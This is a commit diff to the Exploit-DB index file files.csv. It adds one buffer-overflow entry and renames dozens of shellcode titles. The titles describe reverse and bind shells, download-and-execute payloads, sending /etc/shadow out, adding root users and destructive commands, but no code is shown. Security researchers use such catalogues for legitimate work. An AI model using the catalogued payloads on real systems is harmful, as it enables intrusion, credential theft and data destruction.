DB: 2017-08-22

16 new exploits Easy DVD Creater 2.5.11 - Buffer Overflow (SEH) FreeBSD/x86 - Bind 4883/TCP with Auth Shellcode (222 bytes) FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes) Cisco IOS - Bind Password Shellcode (116 bytes) Cisco IOS - New TTY_ Privilege level to 15_ No password Shellcode Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes) Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes) Linux/x86-64 - Reverse TCP Semi-Stealth Shell Shellcode (88+ bytes) (Generator) Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes) Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes) Linux/x86 - Connectback 54321/UDP Live Packet Capture Shellcode (151 bytes) Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes) Linux/x86 - Connect back (140.115.53.35:9999) + Download a file (cb) + Execute Shellcode (149 bytes) Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes) Linux/x86 - Writes A PHP connectback shell (/var/www/cb.php) To The Filesystem Shellcode (508 bytes) Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) Shellcode (155 bytes) Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes) Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes) (Generator) Linux/x86 - Connectback (127.0.0.1:80) (XOR Encoded) Shellcode (371 bytes) Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes) Linux/x86 - Bind Password 64713/TCP Shellcode (166 bytes) Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes) Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes) Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes) Linux/x86 - Connectback Shellcode (90 bytes) Linux/x86 - Reverse TCP Shell Shellcode (90 bytes) (Generator) Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes) Solaris/SPARC - Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator) Solaris/SPARC - connect-back Shellcode (204 bytes) Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes) Win32 - Connectback + receive + save + execute Shellcode Win32 - ConnectBack + Download A File + Save + Execute Shellcode Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes) Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes) (Generator) Linux/x86 - Netcat Connectback 8080/TCP Shellcode (76 bytes) Linux/x86 - Reverse Netcat Shell (8080/TCP) Shellcode (76 bytes) Linux/ARM - Add root user 'shell-storm' with password 'toor' Shellcode (151 bytes) Linux/ARM - Add Root User (shell-storm/toor) Shellcode (151 bytes) Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes) Linux/SuperH (sh4) - Add root user 'shell-storm' with password 'toor' Shellcode (143 bytes) Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes) Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) Linux/MIPS - Add user(UID 0) 'rOOt' with password 'pwn3d' Shellcode (164 bytes) Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes) Linux/x86-64 - Connect Back Shellcode (139 bytes) Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86-64 - Bind TCP Password Shell (4444/TCP) Shellcode (81/96 bytes with password) Linux/x86-64 - Reverse TCP Connect Shellcode (77-85/90-98 bytes with Password) Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes) Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes) Linux/x86-64 - Bind 31173/TCP Password Shellcode (92 bytes) Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Linux/x86-64 - Bind 4444/TCP Password Shellcode (162 bytes) Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes) Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (1) (122 bytes) Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes) Linux/x86-64 - Ncat Shellcode (SSL_ MultiChannel_ Persistant_ Fork_ IPv4/6_ Password) (176 bytes) Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes) Linux/x86-64 - Bind Shell / Syscall Persistent / Multi-terminal / Password / Daemon Shellcode (83/148/177 bytes) Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Windows x64 - Bind Password (h271508F) 2493/TCP Shellcode (825 bytes) Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes) Linux/x86_64 - kill All Processes Shellcode (19 bytes) Linux/x86_64 - Fork Bomb Shellcode (11 bytes) Apache2Triad 1.5.4 - Multiple Vulnerabilities Joomla! Component Flip Wall 8.0 - 'wallid' Parameter SQL Injection Joomla! Component Sponsor Wall 8.0 - SQL Injection PHP Classifieds Script 5.6.2 - SQL Injection Affiliate Niche Script 3.4.0 - SQL Injection PHP Coupon Script 6.0 - 'cid' Parameter SQL Injection iTech Social Networking Script 3.08 - SQL Injection Joomla! Component FocalPoint 1.2.3 - SQL Injection Php Cloud mining Script - Authentication Bypass Joomla! Component Ajax Quiz 1.8 - SQL Injection PHP-Lance 1.52 - 'subcat' Parameter SQL Injection PHP Jokesite 2.0 - 'joke_id' Parameter SQL Injection PHPMyWind 5.3 - Cross-Site Scripting
2017-08-22 05:01:20 +00:00 · 2017-08-22 05:01:20 +00:00 · e4f4ca48ad
commit e4f4ca48ad
parent ce5d8c0fdd
17 changed files with 806 additions and 32 deletions
--- a/files.csv
+++ b/files.csv
@ -9206,6 +9206,7 @@ id,file,description,date,author,platform,type,port
 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0
 42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0
+42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15790,7 +15791,7 @@ id,file,description,date,author,platform,type,port
 13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse /bin/sh Shell (127.0.0.1:8000) Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0
 13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - /bin/sh Encrypted Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0
-13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind 4883/TCP with Auth Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
+13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0
 13271,platforms/freebsd_x86/shellcode/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0
 13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0
 13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0
@ -15811,11 +15812,11 @@ id,file,description,date,author,platform,type,port
 13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0
 13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0
 13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback 21/TCP Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
-13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS - Bind Password Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
-13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY_ Privilege level to 15_ No password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
+13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
+13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0
 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0
 13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0
-13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Connect Back Semi-Stealth Shellcode (88+ bytes)",2006-04-21,phar,lin_x86-64,shellcode,0
+13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth Shell  Shellcode (88+ bytes)  (Generator)",2006-04-21,phar,lin_x86-64,shellcode,0
 13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0
 13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0
@ -15823,7 +15824,7 @@ id,file,description,date,author,platform,type,port
 13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
 13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0
 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0
-13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - connect back (192.168.100.1:2313) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
+13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0
 13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0
 13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0
@ -15847,7 +15848,7 @@ id,file,description,date,author,platform,type,port
 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0
 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0
 13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator (Generator)",2008-12-09,sm4x,generator,shellcode,0
-13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Connectback 54321/UDP Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
+13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0
 13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0
 13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0
@ -15855,10 +15856,10 @@ id,file,description,date,author,platform,type,port
 13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0
 13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0
 13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0
-13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - Connect back (140.115.53.35:9999) + Download a file (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
+13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0
 13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0
-13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Connectback Port 8192.send.exit /etc/shadow Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
-13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Writes A PHP connectback shell (/var/www/cb.php) To The Filesystem Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
+13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) Shellcode (155 bytes)",2008-08-18,0in,lin_x86,shellcode,0
+13340,platforms/lin_x86/shellcode/13340.c,"Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes)",2008-08-18,GS2008,lin_x86,shellcode,0
 13341,platforms/lin_x86/shellcode/13341.c,"Linux/x86 - rm -rf / Attempts To Block The Process From Being Stopped Shellcode (132 bytes)",2008-08-18,onionring,lin_x86,shellcode,0
 13342,platforms/lin_x86/shellcode/13342.c,"Linux/x86 - setuid(0) . setgid(0) . aslr_off Shellcode (79 bytes)",2008-08-18,LiquidWorm,lin_x86,shellcode,0
 13343,platforms/lin_x86/shellcode/13343.asm,"Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes)",2007-04-02,mu-b,lin_x86,shellcode,0
@ -15882,16 +15883,16 @@ id,file,description,date,author,platform,type,port
 13361,platforms/lin_x86/shellcode/13361.c,"Linux/x86 - Bind 2707/TCP Shellcode (84 bytes)",2006-07-04,oveRet,lin_x86,shellcode,0
 13362,platforms/lin_x86/shellcode/13362.c,"Linux/x86 - execve() Diassembly Obfuscation Shellcode (32 bytes)",2006-05-14,BaCkSpAcE,lin_x86,shellcode,0
 13363,platforms/lin_x86/shellcode/13363.c,"Linux/x86 - Bind 31337/TCP SET_PORT() Shellcode (100 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
-13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - SET_IP() Connectback (192.168.13.22:31337) Shellcode (82 bytes)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
+13364,platforms/lin_x86/shellcode/13364.c,"Linux/x86 - Reverse TCP Shell (192.168.13.22:31337) Shellcode (82 bytes)  (Generator)",2006-05-08,"Benjamin Orozco",lin_x86,shellcode,0
 13365,platforms/lin_x86/shellcode/13365.c,"Linux/x86 - execve(/bin/sh) Shellcode (24 bytes)",2006-05-01,hophet,lin_x86,shellcode,0
-13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Connectback (127.0.0.1:80) (XOR Encoded) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
+13366,platforms/lin_x86/shellcode/13366.txt,"Linux/x86 - Reverse TCP XOR Encoded Shell (127.0.0.1:80/TCP) Shellcode (371 bytes)",2006-04-18,xort,lin_x86,shellcode,0
 13367,platforms/lin_x86/shellcode/13367.c,"Linux/x86 - execve(/bin/sh) + .ZIP Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
 13368,platforms/lin_x86/shellcode/13368.c,"Linux/x86 - execve(/bin/sh) + .RTF Header Shellcode (30 bytes)",2006-04-17,izik,lin_x86,shellcode,0
 13369,platforms/lin_x86/shellcode/13369.c,"Linux/x86 - execve(/bin/sh) + .RIFF Header Shellcode (28 bytes)",2006-04-17,izik,lin_x86,shellcode,0
 13370,platforms/lin_x86/shellcode/13370.c,"Linux/x86 - execve(/bin/sh) + .BMP Bitmap Header Shellcode (27 bytes)",2006-04-17,izik,lin_x86,shellcode,0
 13371,platforms/lin_x86/shellcode/13371.c,"Linux/x86 - /tmp/swr to SWAP restore Shellcode (109 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
 13372,platforms/lin_x86/shellcode/13372.c,"Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)",2006-04-16,"Gotfault Security",lin_x86,shellcode,0
-13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind Password 64713/TCP Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
+13373,platforms/lin_x86/shellcode/13373.c,"Linux/x86 - Bind TCP Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
 13374,platforms/lin_x86/shellcode/13374.c,"Linux/x86 - Bind 64713/TCP Shellcode (86 bytes)",2006-04-06,"Gotfault Security",lin_x86,shellcode,0
 13375,platforms/lin_x86/shellcode/13375.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
 13376,platforms/lin_x86/shellcode/13376.c,"Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0
@ -15911,7 +15912,7 @@ id,file,description,date,author,platform,type,port
 13390,platforms/lin_x86/shellcode/13390.c,"Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13391,platforms/lin_x86/shellcode/13391.c,"Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13392,platforms/lin_x86/shellcode/13392.c,"Linux/x86 - chmod(/etc/shadow_ 0666) + exit() Shellcode (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Connectback 127.0.0.1:31337/TCP Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
+13393,platforms/lin_x86/shellcode/13393.c,"Linux/x86 - Reverse TCP Shell (127.0.0.1:31337/TCP) Shellcode (74 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13394,platforms/lin_x86/shellcode/13394.c,"Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13395,platforms/lin_x86/shellcode/13395.c,"Linux/x86 - getppid() + execve(/proc/pid/exe) Shellcode (51 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13396,platforms/lin_x86/shellcode/13396.c,"Linux/x86 - Quick (yet conditional_ eax != 0 and edx == 0) exit Shellcode (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0
@ -15919,7 +15920,7 @@ id,file,description,date,author,platform,type,port
 13398,platforms/lin_x86/shellcode/13398.c,"Linux/x86 - setreuid(0_ 0) + execve(/bin/sh) Shellcode (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13399,platforms/lin_x86/shellcode/13399.c,"Linux/x86 - execve(/bin/sh) + PUSH Shellcode (23 bytes)",2006-01-21,izik,lin_x86,shellcode,0
 13400,platforms/lin_x86/shellcode/13400.c,"Linux/x86 - cat /dev/urandom > /dev/console Shellcode (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0
-13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Connectback Shellcode (90 bytes)",2005-12-28,xort,lin_x86,shellcode,0
+13401,platforms/lin_x86/shellcode/13401.c,"Linux/x86 - Reverse  TCP Shell Shellcode (90 bytes)  (Generator)",2005-12-28,xort,lin_x86,shellcode,0
 13402,platforms/lin_x86/shellcode/13402.c,"Linux/x86 - Socket-proxy Shellcode (372 bytes)",2005-12-28,xort,lin_x86,shellcode,0
 13403,platforms/lin_x86/shellcode/13403.c,"Linux/x86 - dup2(0_0); dup2(0_1); dup2(0_2); Shellcode (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
 13404,platforms/lin_x86/shellcode/13404.c,"Linux/x86 - if(read(fd_buf_512)<=2) _exit(1) else buf(); Shellcode (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0
@ -16009,12 +16010,12 @@ id,file,description,date,author,platform,type,port
 13488,platforms/sco_x86/shellcode/13488.c,"SCO/x86 - execve(_/bin/sh__ ..._ NULL); Shellcode (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0
 13489,platforms/solaris_sparc/shellcode/13489.c,"Solaris/SPARC - Download File + Execute Shellcode (278 bytes)",2006-11-21,xort,solaris_sparc,shellcode,0
 13490,platforms/solaris_sparc/shellcode/13490.c,"Solaris/SPARC - executes command after setreuid Shellcode (92+ bytes)",2006-10-21,bunker,solaris_sparc,shellcode,0
-13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC - connect-back (with XNOR encoded session) Shellcode (600 bytes)",2006-07-21,xort,solaris_sparc,shellcode,0
+13491,platforms/solaris_sparc/shellcode/13491.c,"Solaris/SPARC -  Reverse TCP XNOR Encoded Shell (44434/TCP) Shellcode (600 bytes) (Generator)",2006-07-21,xort,solaris_sparc,shellcode,0
 13492,platforms/solaris_sparc/shellcode/13492.c,"Solaris/SPARC - setreuid/execve Shellcode (56 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
 13493,platforms/solaris_sparc/shellcode/13493.c,"Solaris/SPARC - Bind 6666/TCP Shellcode (240 bytes)",2005-11-20,lhall,solaris_sparc,shellcode,0
 13494,platforms/solaris_sparc/shellcode/13494.txt,"Solaris/SPARC - execve /bin/sh Shellcode (52 bytes)",2004-09-26,LSD-PLaNET,solaris_sparc,shellcode,0
 13495,platforms/solaris_sparc/shellcode/13495.c,"Solaris/SPARC - Bind 6789/TCP Shellcode (228 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
-13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - connect-back Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
+13496,platforms/solaris_sparc/shellcode/13496.c,"Solaris/SPARC - Reverse TCP Shell (192.168.1.4:5678/TCP) Shellcode (204 bytes)",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0
 13497,platforms/solaris_sparc/shellcode/13497.txt,"Solaris/SPARC - Bind Shellcode (240 bytes)",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0
 13498,platforms/solaris_x86/shellcode/13498.php,"Solaris/x86 - Bind TCP Shellcode (Generator)",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0
 13499,platforms/solaris_x86/shellcode/13499.c,"Solaris/x86 - setuid(0) + execve(//bin/sh); + exit(0) Null-Free Shellcode (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0
@ -16031,7 +16032,7 @@ id,file,description,date,author,platform,type,port
 13511,platforms/win_x86/shellcode/13511.c,"Win32/XP SP2 - cmd.exe Shellcode (57 bytes)",2009-02-03,Stack,win_x86,shellcode,0
 13512,platforms/win_x86/shellcode/13512.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder Alphanumeric Shellcode (67 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
 13513,platforms/win_x86/shellcode/13513.c,"Win32 - PEB 'Kernel32.dll' ImageBase Finder (ASCII Printable) Shellcode (49 bytes)",2008-09-03,Koshi,win_x86,shellcode,0
-13514,platforms/win_x86/shellcode/13514.asm,"Win32 - Connectback + receive + save + execute Shellcode",2008-08-25,loco,win_x86,shellcode,0
+13514,platforms/win_x86/shellcode/13514.asm,"Win32 - ConnectBack + Download A File + Save + Execute Shellcode",2008-08-25,loco,win_x86,shellcode,0
 13515,platforms/generator/shellcode/13515.pl,"Win32 - Download File + Execute Shellcode (Browsers Edition) (Generator) (275+ bytes)",2008-03-14,"YAG KOHHA",generator,shellcode,0
 13516,platforms/win_x86/shellcode/13516.asm,"Win32 - Download File + Execute Shellcode (192 bytes)",2007-06-27,czy,win_x86,shellcode,0
 13517,platforms/win_x86/shellcode/13517.asm,"Win32 - Download File + Execute Shellcode (124 bytes)",2007-06-14,Weiss,win_x86,shellcode,0
@ -16045,7 +16046,7 @@ id,file,description,date,author,platform,type,port
 13525,platforms/win_x86/shellcode/13525.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (29 bytes)",2005-07-26,loco,win_x86,shellcode,0
 13526,platforms/win_x86/shellcode/13526.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (31 bytes)",2005-01-26,twoci,win_x86,shellcode,0
 13527,platforms/win_x86/shellcode/13527.c,"Windows 9x/NT/2000/XP - PEB method Shellcode (35 bytes)",2005-01-09,oc192,win_x86,shellcode,0
-13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Overflow Connect Back Shellcode (275 bytes)",2004-10-25,lion,win_x86,shellcode,0
+13528,platforms/win_x86/shellcode/13528.c,"Windows XP/2000/2003 - Reverse TCP Shell (127.0.0.1:53) Shellcode (275 bytes)  (Generator)",2004-10-25,lion,win_x86,shellcode,0
 13529,platforms/win_x86/shellcode/13529.c,"Windows XP/2000/2003 - Download File + Execute Shellcode (241 bytes)",2004-10-25,lion,win_x86,shellcode,0
 13530,platforms/win_x86/shellcode/13530.asm,"Windows XP - Download File + Execute Shellcode",2004-09-26,"Peter Winter-Smith",win_x86,shellcode,0
 13531,platforms/win_x86/shellcode/13531.c,"Windows XP SP1 - Bind 58821/TCP Shellcode (116 bytes)",2004-09-26,silicon,win_x86,shellcode,0
@ -16134,7 +16135,7 @@ id,file,description,date,author,platform,type,port
 13733,platforms/solaris/shellcode/13733.c,"Solaris/x86 - SystemV killall command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",solaris,shellcode,0
 13742,platforms/lin_x86/shellcode/13742.c,"Linux/x86 - chown root:root /bin/sh Shellcode (48 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
 13743,platforms/lin_x86/shellcode/13743.c,"Linux/x86 - give all user root access when execute /bin/sh Shellcode (45 bytes)",2010-06-06,gunslinger_,lin_x86,shellcode,0
-14334,platforms/lin_x86/shellcode/14334.c,"Linux/x86 - Netcat Connectback 8080/TCP Shellcode (76 bytes)",2010-07-11,blake,lin_x86,shellcode,0
